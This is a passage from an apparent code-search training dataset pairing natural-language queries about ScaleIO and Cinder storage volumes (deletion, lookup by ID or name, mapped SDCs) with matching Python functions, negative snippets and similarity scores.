base\n if len(unit) == len(u):\n base = unit\n else:\n base = unit[1:]\n\n # Check if we know this unit's base, otherwise use default\n if base in unit_base:\n b = unit_base[base]\n pow = { k+base:v for v, k in enumerate(pre) }\n\n return float(intsize)*(b**pow[unit])", "def clean_size(size):\n size = size.replace(\"M\",\"\")\n if size.endswith(\"k\"):\n size = float(size[:-1])/1000\n elif size == \"Varies with device\":\n size = np.NaN\n else:\n size = float(size)\n return size", "def format_size(size):\n size = float(size)\n for unit in ['bit','Kibit','Mibit','Gibit']:\n if size < 1024.0:\n return \"{size:3.2f}{unit}\".format(size=size, unit=unit)\n size /= 1024.0\n return \"{size:.2f}{unit}\".format(size=size, unit='TiB')", "def _SizeCalculator(partition_size):\n # Max image size grows less than partition size, which means\n # footer size grows faster than partition size.\n return int(math.pow(partition_size, 0.95))", "def bytesto(self, bytes, to, bsize=1024):\n a = {'k': 1, 'm': 2, 'g': 3, 't': 4, 'p': 5, 'e': 6}\n r = float(bytes)\n for i in range(a[to]):\n r = r / bsize\n r = round(r, 1)\n return(r)", "def get_size(size):\n if size.isdigit():\n return int(size)\n\n def do_get_size(num, unit):\n u = units[unit]\n if num.find('.') == -1:\n return int(num) * u\n return int(float(num) * u)\n\n s = size.strip().upper()\n if s.find(' ') == -1:\n num, unit = re.sub(r\"([\\d.]+)\", r\"\\1 \", s).split()\n 
else:\n num, unit = s.split()\n\n try:\n return do_get_size(num, unit)\n except KeyError:\n\traise Exception('unknown size unit[%s]' % size)", "def parse_size(size_str):\n try:\n return int(size_str)\n except ValueError, e:\n pass\n\n try:\n num = int(size_str[:-1])\n except ValueError, e:\n raise VMBuilderUserError(\"Invalid size: %s\" % size_str)\n\n if size_str[-1:] == 'g' or size_str[-1:] == 'G':\n return num * 1024\n if size_str[-1:] == 'm' or size_str[-1:] == 'M':\n return num\n if size_str[-1:] == 'k' or size_str[-1:] == 'K':\n return num / 1024" ]
[ "0.6768083", "0.6544661", "0.6347236", "0.6286869", "0.628502", "0.628502", "0.628502", "0.62824434", "0.6250458", "0.61724716", "0.6168352", "0.6118886", "0.6084759", "0.6077484", "0.60627866", "0.60627866", "0.6033113", "0.5994688", "0.5991111", "0.59894925", "0.59884065", "0.59538424", "0.5935738", "0.59067076", "0.58978975", "0.5856839", "0.5854483", "0.58380264", "0.5828038", "0.57961303" ]
0.6986386
0
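The divmod branch in the record above is the usual round-up-to-a-multiple idiom. Assuming sizes are in MB so that 8 GB = 8192, the same result in one expression (annotation, not a dataset record):

def round_up_to_8gb(volsize_mb, increment=8192):
    # Ceiling division, then scale back to the nearest 8 GB boundary.
    return ((int(volsize_mb) + increment - 1) // increment) * increment

assert round_up_to_8gb(8192) == 8192   # already on a boundary
assert round_up_to_8gb(8193) == 16384  # rounds up, never down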
removeMode = 'ONLY_ME' | 'INCLUDING_DESCENDANTS' | 'DESCENDANTS_ONLY' | 'WHOLE_VTREE'. Using kwargs it will be possible to tell delete_volume() to unmap all SDCs before deleting. Not working yet.
def delete_volume(self, volObj, removeMode='ONLY_ME', **kwargs): if kwargs: for key, value in kwargs.iteritems(): if key =='autoUnmap' and value ==True: # Find all mapped SDS to this volObj # Call unmap for all of them if self.get_volume_all_sdcs_mapped(volObj): try: self.conn.cluster.unmap_volume_from_sdc(volObj, enableMapAllSdcs=False) except: raise RuntimeError("delete_volume() - enableMapAllSdcs error") else: # All SDS not enabled so loop through all mapped SDCs of volume and remove one by one for sdc in self.get_sdc_for_volume(volObj): try: self.unmap_volume_from_sdc(volObj, self.get_sdc_by_id(sdc['sdcId'])) except: raise RuntimeError("delete_volume() - unmap_volume_from_sdc() error") # TODO: # Check if object parameters are the correct ones, otherwise throw error self.conn.connection._check_login() deleteVolumeDict = {'removeMode': removeMode} try: response = self.conn.connection._do_post("{}/{}{}/{}".format(self.conn.connection._api_url, "instances/Volume::", volObj.id, 'action/removeVolume'), json=deleteVolumeDict) except: raise RuntimeError("delete_volume() - Communication error with ScaleIO Gateway") return response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_export(self, context, volume):\n pass", "def delete(self):\n for lv in self.logical_volumes:\n self.delete_lv(lv_name=lv)\n\n super().delete()", "def test_aws_service_api_volume_delete(self):\n pass", "def snap_remove(packages, *flags):\n if type(packages) is not list:\n packages = [packages]\n\n flags = list(flags)\n\n message = 'Removing snap(s) \"%s\"' % ', '.join(packages)\n if flags:\n message += ' with options \"%s\"' % ', '.join(flags)\n\n log(message, level='INFO')\n return _snap_exec(['remove'] + flags + packages)", "def rm(args):\n args.delete = True\n return remove(args)", "def removeOnDestroy(call, args=(), kwargs={}, nodeClass='*'):\n pass", "def test_delete_volume_failure_modes(self):\n ctxt = context.get_admin_context()\n extra_specs = {}\n type_ref = volume_types.create(ctxt, 'hgst-1', extra_specs)\n volume = {'id': '1', 'name': 'volume1',\n 'display_name': '',\n 'volume_type_id': type_ref['id'],\n 'size': 10,\n 'provider_id': 'volume10'}\n self._fail_space_delete = True\n # This should not throw an exception, space-delete failure not problem\n self.driver.delete_volume(volume)\n self._fail_space_delete = False\n volume['provider_id'] = None\n # This should also not throw an exception\n self.driver.delete_volume(volume)", "def delete_volume(self, context, volume_id, unmanage_only=False):\n context = context.elevated()\n\n volume_ref = self.db.volume_get(context, volume_id)\n\n if context.project_id != volume_ref['project_id']:\n project_id = volume_ref['project_id']\n else:\n project_id = context.project_id\n\n LOG.info(_(\"volume %s: deleting\"), volume_ref['id'])\n if volume_ref['attach_status'] == \"attached\":\n # Volume is still attached, need to detach first\n raise exception.VolumeAttached(volume_id=volume_id)\n\n self._notify_about_volume_usage(context, volume_ref, \"delete.start\")\n self._reset_stats()\n\n try:\n self._delete_cascaded_volume(context, volume_id)\n except Exception:\n LOG.exception(_(\"Failed to deleting volume\"))\n # Get reservations\n try:\n reserve_opts = {'volumes': -1, 'gigabytes': -volume_ref['size']}\n QUOTAS.add_volume_type_opts(context,\n reserve_opts,\n volume_ref.get('volume_type_id'))\n reservations = QUOTAS.reserve(context,\n project_id=project_id,\n **reserve_opts)\n except Exception:\n reservations = None\n LOG.exception(_(\"Failed to update usages deleting volume\"))\n\n # Delete glance metadata if it exists\n try:\n self.db.volume_glance_metadata_delete_by_volume(context, volume_id)\n LOG.debug(_(\"volume %s: glance metadata deleted\"),\n volume_ref['id'])\n except exception.GlanceMetadataNotFound:\n LOG.debug(_(\"no glance metadata found for volume %s\"),\n volume_ref['id'])\n\n self.db.volume_destroy(context, volume_id)\n LOG.info(_(\"volume %s: deleted successfully\"), volume_ref['id'])\n self._notify_about_volume_usage(context, volume_ref, \"delete.end\")\n\n # Commit the reservations\n if reservations:\n QUOTAS.commit(context, reservations, project_id=project_id)\n\n self.publish_service_capabilities(context)\n\n return True", "def delete_volume(self, uid):\n try:\n volInfo = self.get_volume_info(uid)\n except SVCVolumeNotFound as ex:\n LOG.warn(_(\"No volume with UID %s found.\") % uid)\n # assume deleted if not found\n return\n\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n self.remove_fcmapping(uid)\n cmd = \"svctask rmvdisk -force %s\" % (volID)\n self._svc_command(cmd)", "def delete(self, name):\n result = self.cm.find_name(name)\n path = result[0]['path']\n delete_path = Path(f'{path}/{name}')\n try:\n 
os.system(f\"rmdir {delete_path}\")\n result[0]['State'] = 'deleted'\n result = self.update_dict(result)\n except:\n Console.error(\"volume is either not empty or not exist\")\n return result", "def removeControl(*args):", "def removeControl(*args):", "def removeControl(*args):", "def removeControl(*args):", "def destroy(self, log_level=''):\n # Get all the additional volumes and detach,delete.\n volumes = self.utils.get_volumes_with_tag(\n {'cluster_name': config.ENV_DATA['cluster_name']}\n )\n self.flexy_instance.destroy()\n self.utils.detach_and_delete_vols(volumes)", "def do_delete_configured_volume(self, arg):\n args = self.parse_arguments(arg)\n if len(args) == 0:\n self.perror(\"No storage specified.\")\n return\n self.do_coroutine(self._localStorageRoutines.delete_configured_volume_routine(args[0]))", "def remove_kernel(self, kernel_id):", "def main_remove(args):\n return remove_command(args.directory, args.name)", "def database_volume_delete(volume_uuid):\n db = database_get()\n session = db.session()\n query = session.query(model.Volume)\n query.filter(model.Volume.uuid == volume_uuid).delete()\n session.commit()", "def test_delete_volume(self):\n ctxt = context.get_admin_context()\n extra_specs = {}\n type_ref = volume_types.create(ctxt, 'hgst-1', extra_specs)\n volume = {'id': '1', 'name': 'volume1',\n 'display_name': '',\n 'volume_type_id': type_ref['id'],\n 'size': 10,\n 'provider_id': 'volume10'}\n self.driver.delete_volume(volume)\n expected = {'name': 'volume10'}\n self.assertDictMatch(expected, self.deleted)", "def svn_fs_delete_berkeley(*args):\r\n return _fs.svn_fs_delete_berkeley(*args)", "def snap_delete_by_volumename(mnode, volname):\n\n cmd = \"gluster snapshot delete volume %s --mode=script\" % volname\n return g.run(mnode, cmd)", "def remove_volume_letters(keep=None):\n if not keep:\n keep = ''\n\n script = []\n for vol in get_volumes():\n if vol['Letter'].upper() != keep.upper():\n script.append('select volume {}'.format(vol['Number']))\n script.append('remove noerr')\n\n # Run script\n try:\n run_diskpart(script)\n except subprocess.CalledProcessError:\n pass", "def do_command(self, args):\n ostypeops = dbops.OsTypes()\n ostypeops.delete(args)", "def remove():", "def delete_volumes(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n for volume in volumes:\n command = 'cinder delete %s' % volume['id']\n a = Popen(command.split(), stdout=STDOUT, stderr=STDERR).communicate()[0]", "def delete_volumeaccessright_record( vac ):\n \n principal_id = vac.owner_id.email \n volume_name = vac.volume.name \n \n try:\n observer_core.ensure_volume_access_right_absent( principal_id, volume_name )\n except Exception, e:\n traceback.print_exc()\n logger.error(\"Failed to revoke access from %s to %s\" % (principal_id, volume_name))\n raise e\n \n return True", "def purge_volume(self, volume_path, data_isolated=False):\n\n trash = os.path.join(self.volume_prefix, \"_deleting\")\n trashed_volume = os.path.join(trash, volume_path.volume_id)\n\n try:\n self.fs.stat(trashed_volume)\n except cephfs.ObjectNotFound:\n log.warning(\"Trying to purge volume '{0}' but it's already been purged\".format(\n trashed_volume))\n return\n\n def rmtree(root_path):\n log.debug(\"rmtree {0}\".format(root_path))\n dir_handle = self.fs.opendir(root_path)\n d = self.fs.readdir(dir_handle)\n while d:\n if d.d_name not in [\".\", \"..\"]:\n # Do not use os.path.join because it is sensitive\n # to string encoding, we just pass through dnames\n # as byte arrays\n d_full = 
\"{0}/{1}\".format(root_path, d.d_name)\n if d.is_dir():\n rmtree(d_full)\n else:\n self.fs.unlink(d_full)\n\n d = self.fs.readdir(dir_handle)\n self.fs.closedir(dir_handle)\n\n self.fs.rmdir(root_path)\n\n rmtree(trashed_volume)\n\n if data_isolated:\n pool_name = \"{0}{1}\".format(self.POOL_PREFIX, volume_path.volume_id)\n osd_map = self._rados_command(\"osd dump\", {})\n pool_id = self._get_pool_id(osd_map, pool_name)\n mds_map = self._rados_command(\"mds dump\", {})\n if pool_id in mds_map['data_pools']:\n self._rados_command(\"mds remove_data_pool\", {\n 'pool': pool_name\n })\n self._rados_command(\"osd pool delete\",\n {\n \"pool\": pool_name,\n \"pool2\": pool_name,\n \"sure\": \"--yes-i-really-really-mean-it\"\n })", "def _deauthorize(self, volume_path, auth_id):\n client_entity = \"client.{0}\".format(auth_id)\n path = self._get_path(volume_path)\n pool_name = self._get_ancestor_xattr(path, \"ceph.dir.layout.pool\")\n try:\n namespace = self.fs.getxattr(path, \"ceph.dir.layout.pool_\"\n \"namespace\").decode()\n except cephfs.NoData:\n namespace = None\n\n # The auth_id might have read-only or read-write mount access for the\n # volume path.\n access_levels = ('r', 'rw')\n want_mds_caps = ['allow {0} path={1}'.format(access_level, path)\n for access_level in access_levels]\n if namespace:\n want_osd_caps = ['allow {0} pool={1} namespace={2}'.format(access_level, pool_name, namespace)\n for access_level in access_levels]\n else:\n want_osd_caps = ['allow {0} pool={1}'.format(access_level, pool_name)\n for access_level in access_levels]\n\n\n try:\n existing = self._rados_command(\n 'auth get',\n {\n 'entity': client_entity\n }\n )\n\n def cap_remove(orig_mds_caps, orig_osd_caps, want_mds_caps, want_osd_caps):\n mds_cap_tokens = orig_mds_caps.split(\",\")\n osd_cap_tokens = orig_osd_caps.split(\",\")\n\n for want_mds_cap, want_osd_cap in zip(want_mds_caps, want_osd_caps):\n if want_mds_cap in mds_cap_tokens:\n mds_cap_tokens.remove(want_mds_cap)\n osd_cap_tokens.remove(want_osd_cap)\n break\n\n return \",\".join(mds_cap_tokens), \",\".join(osd_cap_tokens)\n\n cap = existing[0]\n orig_mds_caps = cap['caps'].get('mds', \"\")\n orig_osd_caps = cap['caps'].get('osd', \"\")\n mds_cap_str, osd_cap_str = cap_remove(orig_mds_caps, orig_osd_caps,\n want_mds_caps, want_osd_caps)\n\n if not mds_cap_str:\n self._rados_command('auth del', {'entity': client_entity}, decode=False)\n else:\n self._rados_command(\n 'auth caps',\n {\n 'entity': client_entity,\n 'caps': [\n 'mds', mds_cap_str,\n 'osd', osd_cap_str,\n 'mon', cap['caps'].get('mon', 'allow r')]\n })\n\n # FIXME: rados raising Error instead of ObjectNotFound in auth get failure\n except rados.Error:\n # Already gone, great.\n return", "def remove(self, mount_point, delete_vols=False, detach=True):\n log.debug(\"Removing volume-based FS @ mount point {0} (delete_vols: \"\n \"{1}; detach: {2})\".format(mount_point, delete_vols, detach))\n self.unmount(mount_point)\n if detach:\n log.debug(\"Detaching volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if self.detach():\n log.debug(\"Detached volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if ((self.static and (ServiceRole.GALAXY_DATA not in self.fs.svc_roles))\n or delete_vols):\n log.debug(\"Deleting volume {0} as part of {1} removal\".format(\n self.volume_id, self.fs.get_full_name()))\n self.delete()\n else:\n log.debug(\"Unmounted {0} but was instructed not to detach volume {1}\"\n .format(self.fs.get_full_name(), self.volume_id))" ]
[ "0.59390444", "0.5883608", "0.5831495", "0.5830611", "0.5827789", "0.5799781", "0.57569474", "0.57451755", "0.572967", "0.5713216", "0.570987", "0.570987", "0.570987", "0.570987", "0.5687949", "0.56447387", "0.5636559", "0.56025016", "0.55944437", "0.55915767", "0.55571306", "0.5547702", "0.5532852", "0.5522827", "0.55222267", "0.5518605", "0.55128074", "0.55004233", "0.5486687", "0.54715866" ]
0.681984
0
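The REST call at the heart of the record above, reduced to its essentials (annotation, not a dataset record): POST a removeVolume action with a removeMode body. The URL shape follows the record; passing auth directly and calling raise_for_status are simplifying assumptions in place of the record's connection object.

import requests

def remove_volume_sketch(api_url, auth, volume_id, remove_mode="ONLY_ME"):
    url = "{}/instances/Volume::{}/action/removeVolume".format(api_url, volume_id)
    resp = requests.post(url, json={"removeMode": remove_mode}, auth=auth)
    resp.raise_for_status()  # surfaces gateway errors instead of returning them
    return resp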
Get ScaleIO Volume object by its ID
def get_volume_by_id(self, id): for vol in self.conn.volumes: if vol.id == id: return vol raise KeyError("Volume with ID " + id + " not found")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_volume_from_id(item_id):\n return volumes[\"data\"][str(item_id)]", "def volume_get(context, volume_id):\n return _volume_get(context, volume_id)", "def find_volume(self, id: str) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def get_volume(self, volume_id):\n url = '%s/volumes/%s' % (self.catalog['volume'], volume_id)\n res = self.get(url)\n if res['status'] == 200:\n return json.loads(res['body'])['volume']\n else:\n LOG.error('Get volume failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)", "def _get_volumes_from_id(volume_id):\n\n volumes = _get_volumes(list_of_volume_ids=volume_id)\n\n return volumes[0] if volumes else volumes", "def get_volume(self, volume_id):\n aname = \"cinder_v%s.get_volume\" % self.version\n with atomic.ActionTimer(self, aname):\n return self._get_client().volumes.get(volume_id)", "def volume():\n vol = sonos.volume\n return vol", "def get_volume(self, volume):\n return self._get(_volume.Volume, volume)", "def get_volume_by_name(self, name):\n for vol in self.conn.volumes:\n if vol.name == name:\n return vol\n raise KeyError(\"Volume with NAME \" + name + \" not found\")", "def get_volume_from_name(item_name):\n item_id = get_id_from_name(item_name)\n return get_volume_from_id(item_id)", "def volume_id(self):\n if self.volume:\n return self.volume.id\n else:\n return None", "def volume_id(self):\n return self._volume_id", "def get_volume(self):\n return self.__volume", "def get_volume(self):\n return int(self.get(COMMAND_UIC, 'GetVolume')['volume'])", "def read_item(id: str, request: Request):\n obj = db.get(id, kind=endpoint_model)\n return obj", "def _create_volume(self):\n vol = {}\n vol['size'] = 1\n vol['availability_zone'] = 'test'\n return db.volume_create(self.context, vol)['id']", "def get_object(id):", "def get_volume(volume, array):\n try:\n return array.get_volume(volume, pending=True)\n except Exception:\n return None", "def get(resource_name, id, opts=None):\n opts = ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n return StorageClass(resource_name, opts)", "def lrs_volume(self, verbose = False):\n if is_package_installed('lrs') != True:\n print 'You must install the optional lrs package ' \\\n 'for this function to work'\n raise NotImplementedError\n\n in_str = self.cdd_Vrepresentation()\n in_str += 'volume'\n in_filename = tmp_filename()\n in_file = file(in_filename,'w')\n in_file.write(in_str)\n in_file.close()\n if verbose: print in_str\n\n lrs_procs = Popen(['lrs',in_filename],\n stdin = PIPE, stdout=PIPE, stderr=PIPE)\n ans, err = lrs_procs.communicate()\n if verbose: \n print ans\n # FIXME: check err\n\n for a_line in ans.splitlines():\n if 'Volume=' in a_line:\n volume = a_line.split('Volume=')[1]\n volume = RDF(QQ(volume))\n return volume\n\n raise ValueError, \"lrs did not return a volume\"", "async def get_volume(self, group_id: int) -> int:\n results = await self._api.call('group', 'get_volume', gid=group_id)\n return int(results.header.vars.get('level'))", "def volume(self):\n return self._volume()", "def volume(self):\n return self._volume()", "def get_object(self, id, **args):\n return self.request(\"{0}/{1}\".format(self.version, id), args)", "def get(self, cls, id):\n\n return FileStorage.__objects[key(cls, id)]", "def get_volume(self):\n return str(round(self._call_player_proxy('VolumeGet', None).unpack()[0]))", "def get_object(self, id_):\n return self._objects.get(id_, 
None)", "async def get_volume(self) -> int:\n return await self._pytheos.api.player.get_volume(self.id)", "def storage_get(context, storage_id):\n return _storage_get(context, storage_id)", "def get_voluuid(disk_object):\n return disk_object.get_image_id()" ]
[ "0.7770249", "0.76687425", "0.74675375", "0.7118734", "0.7027858", "0.6990481", "0.67697716", "0.6507782", "0.6490982", "0.6345176", "0.631454", "0.6314275", "0.616623", "0.6155505", "0.61281794", "0.61262006", "0.60813826", "0.6076707", "0.6064813", "0.60254", "0.5993264", "0.5948487", "0.5948487", "0.5939842", "0.5938867", "0.5895794", "0.58932674", "0.5889505", "0.586973", "0.5865907" ]
0.7940494
0
Get ScaleIO Volume object by its Name
def get_volume_by_name(self, name):
    for vol in self.conn.volumes:
        if vol.name == name:
            return vol
    raise KeyError("Volume with NAME " + name + " not found")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_volume_from_name(item_name):\n item_id = get_id_from_name(item_name)\n return get_volume_from_id(item_id)", "def volume():\n vol = sonos.volume\n return vol", "def get_volume(self, volume):\n return self._get(_volume.Volume, volume)", "def get_volumeslice( volume_name, slice_name ):\n try:\n vs = models.VolumeSlice.objects.get( volume_id__name = volume_name, slice_id__name = slice_name )\n return vs\n except Exception, e:\n logger.exception(e)\n logger.error(\"Failed to query datastore for volumes (mounted in %s)\" % (slice_name if (slice_name is not None or len(slice_name) > 0) else \"UNKNOWN\"))\n return None", "def get_volume_by_id(self, id):\n for vol in self.conn.volumes:\n if vol.id == id:\n return vol\n raise KeyError(\"Volume with ID \" + id + \" not found\")", "def get_volume_from_id(item_id):\n return volumes[\"data\"][str(item_id)]", "def volume_get(context, volume_id):\n return _volume_get(context, volume_id)", "def _create_snowshu_volume(self, volume_name: str) -> docker.models.volumes.Volume:\n try:\n volume = self.client.volumes.get(volume_name)\n except docker.errors.NotFound:\n volume = self.client.volumes.create(\n name=volume_name, driver='local',)\n return volume", "def get_volume(self):\n return self.__volume", "def get_volume(self):\n return str(round(self._call_player_proxy('VolumeGet', None).unpack()[0]))", "def get_volume(self):\n return int(self.get(COMMAND_UIC, 'GetVolume')['volume'])", "def get_volume(self, volume_id):\n url = '%s/volumes/%s' % (self.catalog['volume'], volume_id)\n res = self.get(url)\n if res['status'] == 200:\n return json.loads(res['body'])['volume']\n else:\n LOG.error('Get volume failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)", "def get_volume(cls) -> float:\n raise NotImplementedError", "def Volume(self, default=None):\n return self.data.get('volume', default)", "def find_volume(self, id: str) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def get_volume(volume, array):\n try:\n return array.get_volume(volume, pending=True)\n except Exception:\n return None", "def volume(self):\n return self._volume()", "def volume(self):\n return self._volume()", "def lrs_volume(self, verbose = False):\n if is_package_installed('lrs') != True:\n print 'You must install the optional lrs package ' \\\n 'for this function to work'\n raise NotImplementedError\n\n in_str = self.cdd_Vrepresentation()\n in_str += 'volume'\n in_filename = tmp_filename()\n in_file = file(in_filename,'w')\n in_file.write(in_str)\n in_file.close()\n if verbose: print in_str\n\n lrs_procs = Popen(['lrs',in_filename],\n stdin = PIPE, stdout=PIPE, stderr=PIPE)\n ans, err = lrs_procs.communicate()\n if verbose: \n print ans\n # FIXME: check err\n\n for a_line in ans.splitlines():\n if 'Volume=' in a_line:\n volume = a_line.split('Volume=')[1]\n volume = RDF(QQ(volume))\n return volume\n\n raise ValueError, \"lrs did not return a volume\"", "def snapshot(self, name):\r\n return self.driver.create_volume_snapshot(volume=self, name=name)", "def load_volume(name, nx, ny, nz):\n\n # load raw volume into memory\n img = np.fromfile(name, dtype=np.float32)\n img = np.reshape(img, (ny, nx, nz))\n\n return img.transpose(0, 2, 1)", "def get_volume(self, volume_id):\n aname = \"cinder_v%s.get_volume\" % self.version\n with atomic.ActionTimer(self, aname):\n return self._get_client().volumes.get(volume_id)", "def volume(self):\n vol = None\n if 
self._mixer:\n vol = self._mixer.getvolume()\n return vol", "def getVolume(self):\n return self.__volume", "def create_volume(self, name: str, size: int) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def volume(self):\n return self.structure.volume", "def get_object(self, name):\n try:\n return self.data['objects'][normalize_object_name(name)]\n except KeyError:\n return None", "def get_basic_volume_info(vol_name, vl=None):\n return_dict = None\n try:\n vl, err = get_basic_volume_info_all()\n for v in vl:\n if v['name'] == vol_name:\n return_dict = v\n break\n except Exception, e:\n return None, 'Error getting basic volume information for a specific volume : %s' % str(e)\n else:\n return return_dict, None", "def fusion_api_get_storage_volumes(self, uri=None, param='', api=None, headers=None):\n return self.volume.get(uri=uri, api=api, headers=headers, param=param)", "def byvolume(cls, base, *parts, **kw):\n return cls(base, parts, by='volume', **kw)" ]
[ "0.75305146", "0.69920236", "0.6730676", "0.6723948", "0.6496563", "0.643003", "0.6369791", "0.6362524", "0.62434006", "0.62258524", "0.6180109", "0.608432", "0.60701185", "0.6064235", "0.605456", "0.60444987", "0.6015984", "0.6015984", "0.59529024", "0.59277195", "0.59163225", "0.5862787", "0.5861105", "0.58557796", "0.58487016", "0.58456093", "0.5831641", "0.5826388", "0.5825155", "0.5820187" ]
0.7781022
0
Get the list of SDCs mapped to a specific volume
def get_sdc_for_volume(self, volObj):
    sdcList = []
    if volObj.mapped_sdcs is not None:
        for sdc in volObj.mapped_sdcs:
            sdcList.append(sdc)
    if len(sdcList) == 0:
        self.conn.logger.debug("No SDCs mapped to volume: %s-(%s)"
                               % (volObj.name, volObj.id))
        return []  # returning an empty list is
                   # valid for snapshots or volumes.
    return sdcList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_device_map():\n ret = []\n vlist = subprocess.check_output(['ceph-volume', 'lvm', 'list',\n '--format=json'])\n for osd_id, data in json.loads(vlist.decode('utf8')).items():\n osd_id = normalize_osd_id(osd_id)\n for elem in data:\n for device in elem['devices']:\n ret.append({'id': osd_id, 'path': device})\n return ret", "def get_volume_list():\n return parse_list_output(Popen('cinder list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])", "def get_volume(vol_dir):\n volume = []\n # Retrieve all the dicom filepaths\n files = get_filepaths(vol_dir)\n \n for slice_nr, dicom_path in enumerate(files):\n ds = pydicom.dcmread(dicom_path)\n img = ds.pixel_array\n \n if slice_nr == 0:\n # Get this on the first slice only\n spacing = ds.PixelSpacing\n spacing.append(ds.SliceThickness)\n spacing = np.asarray(spacing)\n \n # Note: In our case, sequence name contains venc and direction info\n sequence_name = ds.SequenceName\n # print(sequence_name)\n\n volume.append(img)\n volume = np.asarray(volume)\n return volume, spacing, sequence_name", "def show_asm_volumes(self):\n sql = \"select NAME from v$asm_diskgroup_stat ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#ASMVOLUME}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }", "def get_volumes():\n vols = []\n try:\n result = run_diskpart(['list volume'])\n except subprocess.CalledProcessError:\n pass\n else:\n # Append volume numbers\n output = result.stdout.decode().strip()\n for tmp in re.findall(r'Volume (\\d+)\\s+([A-Za-z]?)\\s+', output):\n vols.append({'Number': tmp[0], 'Letter': tmp[1]})\n\n return vols", "def get_ceph_disk():\n disks = []\n for srv in get_srv_list():\n cfg = get_srv_config(srv)\n for key in ['osd_data', 'osd_journal', 'mds_data', 'mon_data']:\n mnt_point = cfg[key]\n disk = get_disk_by_mountpoint(find_mount_point(mnt_point))\n if disk not in disks:\n disks.append(disk)\n return disks", "def get_volume_info(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n volume_info_list = []\n for volume in volumes:\n command = 'cinder show %s' % volume['id']\n volume_info = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])\n att = volume_info['attachments'].replace(\"'\", \"\\\"\").replace(\n \"u\\\"\", \"\\\"\").replace(\" None,\", \" \\\"None\\\",\")\n volume_info['device'] = json.loads(att)[0]['device']\n volume_info_list.append(volume_info)\n return volume_info_list", "def volumes(self):", "def get_persistent_disks(k8s_ctx: str, dry_run: bool = False) -> List[str]:\n cmd = f'kubectl --context={k8s_ctx} get pv -o json'\n if dry_run:\n logging.info(cmd)\n else:\n p = safe_exec(cmd)\n if p.stdout:\n pds = json.loads(p.stdout.decode())\n return [i['spec']['csi']['volumeHandle'].split('/')[-1] for i in pds['items']]\n return list()", "def list_volumes(self, node=None):\n\n data = self._perform_get(self._get_disk_path(), Disks)\n volumes = [self._to_volume(volume=v, node=node) for v in 
data]\n return volumes", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def database_volume_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.Volume)\n\n volume_objs = list()\n for volume in query.all():\n nfvi_volume_data = json.loads(volume.nfvi_volume_data)\n nfvi_volume = nfvi.objects.v1.Volume(nfvi_volume_data['uuid'],\n nfvi_volume_data['name'],\n nfvi_volume_data['description'],\n nfvi_volume_data['avail_status'],\n nfvi_volume_data['action'],\n nfvi_volume_data['size_gb'],\n nfvi_volume_data['bootable'],\n nfvi_volume_data['encrypted'],\n nfvi_volume_data['image_uuid'])\n volume_obj = objects.Volume(nfvi_volume)\n volume_objs.append(volume_obj)\n return volume_objs", "def generate_osd_list(ceph_cluster: Ceph):\n client = ceph_cluster.get_ceph_object(\"installer\")\n ceph_osds = ceph_cluster.get_ceph_objects(\"osd\")\n osd_nodes = set()\n disk_list = set()\n for osd in ceph_osds:\n osd_nodes.add(osd.node.vmshortname)\n osd_node_list = list(osd_nodes)\n log.info(osd_node_list)\n for osn in osd_node_list:\n for osd in ceph_osds:\n if osd.node.vmshortname == osn:\n for i in osd.node.vm_node.volumes:\n disk_list.add(i)\n osd_disk_list = list(disk_list)\n log.info(osd_disk_list)\n log.info(len(osd_disk_list))\n dump_osd_data(client, osn, osd_disk_list)\n disk_list.clear()\n osd_disk_list.clear()", "def bootable_volume(volumes):\n for volume in volumes:\n if '/dev/vda' in volume['attachments']:\n return volume", "def collect_existing_mounts():\n result = {}\n for mount in sh.mount().stdout.decode('utf-8').splitlines():\n tokens = mount.split()\n if tokens[1] == 'on' and tokens[0].startswith('/dev/'):\n device = tokens[0][5:]\n result[tokens[2]] = device\n return result", "def _get_device_list(self):\n if self.app.config.cloud_type == 'ec2':\n # c5/m5 on AWS mounts EBS volumes as NVMe:\n # http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/nvme-ebs-volumes.html\n # http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/device_naming.html\n for itype in ['c5', 'm5']:\n if itype in self.app.cloud_interface.get_type():\n return frozenset(glob('/dev/nvme[0-26]n1'))\n return frozenset(glob('/dev/*d[a-z]'))", "def get_all_disk():\n\t\tdisks = []\n\t\tdisks_lines = linux.exe_shell(\"lsblk -o NAME,VENDOR|grep -P 